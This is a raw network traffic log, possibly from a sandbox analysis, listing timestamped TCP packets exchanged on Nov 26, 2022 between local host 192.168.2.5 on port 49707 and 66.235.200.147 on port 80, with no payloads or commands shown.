Nov 26, 2022 11:17:42.598647118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598666906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598712921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598721027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598740101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598752975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598758936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598778009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598807096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598829031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598871946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598898888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598917961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598936081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598951101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598963976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598965883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.599008083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.599039078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.599725962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599751949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599766970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599780083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599793911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599836111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599847078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.599885941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.599914074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599932909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599967003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.599984884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.600013971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.600033045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.600038052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.600058079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.600075960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.600128889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.600878000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.600897074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.600915909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.600935936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.600970030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601001978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601021051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601039886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601059914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601072073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601078987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601110935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601128101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601145983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601165056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601171017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601183891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601202011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601227045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601259947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601697922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601774931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601794004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601814985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601835012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601836920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601854086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601870060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601874113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601892948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601912022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601918936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601933002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601944923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.601952076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601970911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601991892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.601994038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.602056026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.602418900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602438927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602458000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602478027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602480888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.602497101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602514029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.602515936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602535963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602547884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.602555037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602575064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602582932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.602596045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602613926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602634907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602637053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.602653980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.602669001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.602710009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.603585958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603605986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603626013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603643894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603663921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603667974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.603714943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.603725910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603744984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603759050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603789091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603807926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603821039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.603823900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.603925943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.604073048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604091883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604110003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604129076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.604152918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.604159117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604177952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604273081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604291916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604310036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604321957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.604352951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.604464054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604484081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604504108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604521990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604538918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.604540110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.604566097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.604609013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.605026007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605140924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605159998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605178118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605195999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605216026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605226994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.605235100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605253935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605272055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605273008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.605313063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.605319023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605516911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605535984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605549097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605647087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.605889082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.605938911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.605983973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606003046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606020927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606040955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606081963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.606095076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.606101990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606120110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606137991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606163979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.606229067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606247902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606266975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606283903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606290102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.606302023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606307030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.606911898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606930971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606949091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.606976032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607002974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607012987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607032061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607049942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607049942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607069016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607094049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607099056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607130051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607148886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607167006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607182980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607229948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607274055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607292891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607311010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607322931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607331038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607350111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607366085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607391119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607392073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607410908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607429981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607448101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607451916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607515097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607527971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607547045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607564926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607583046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607595921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607630968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607646942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607666969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607685089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607702971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607758045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.607770920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607790947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.607835054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608330965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608350039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608369112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608387947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608402967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608455896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608477116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608495951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608515024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608534098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608552933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608561993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608591080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608601093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608618975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608637094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608655930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608664989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608674049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608685970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608694077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608716011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608738899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608757973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608778000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608797073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.608805895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.608836889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609361887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609380960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609400034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609417915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609416962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609436989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609452009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609482050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609513998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609534025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609551907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609570980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609580040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609590054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609608889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609611988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609627008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609671116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609791040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609810114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609828949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.609833002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609879971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.609987974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610007048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610025883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610045910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610058069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610064983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610084057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610085011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610102892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610121012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610121965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610141993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610161066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610165119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610181093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610199928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610203981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610219002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610255003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610258102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610274076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610292912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610296965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610311031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610328913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610344887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610348940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.610373974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.610383034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611366987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611387968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611407042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611424923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611426115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611443996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611464024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611471891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611481905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611500978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611505985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611519098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611537933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611541033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611557007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611576080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611592054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611609936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611619949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611629963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611649036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611668110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611691952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611730099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611803055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611824989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611844063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611862898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611876011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611881971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611900091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611918926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611923933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611938000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611944914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611958981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611977100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.611979961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.611994982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612015009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612032890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612034082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612051964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612055063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.612071037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612090111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612109900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.612109900 CET	49707	80	192.168.2.5	66.235.200.147
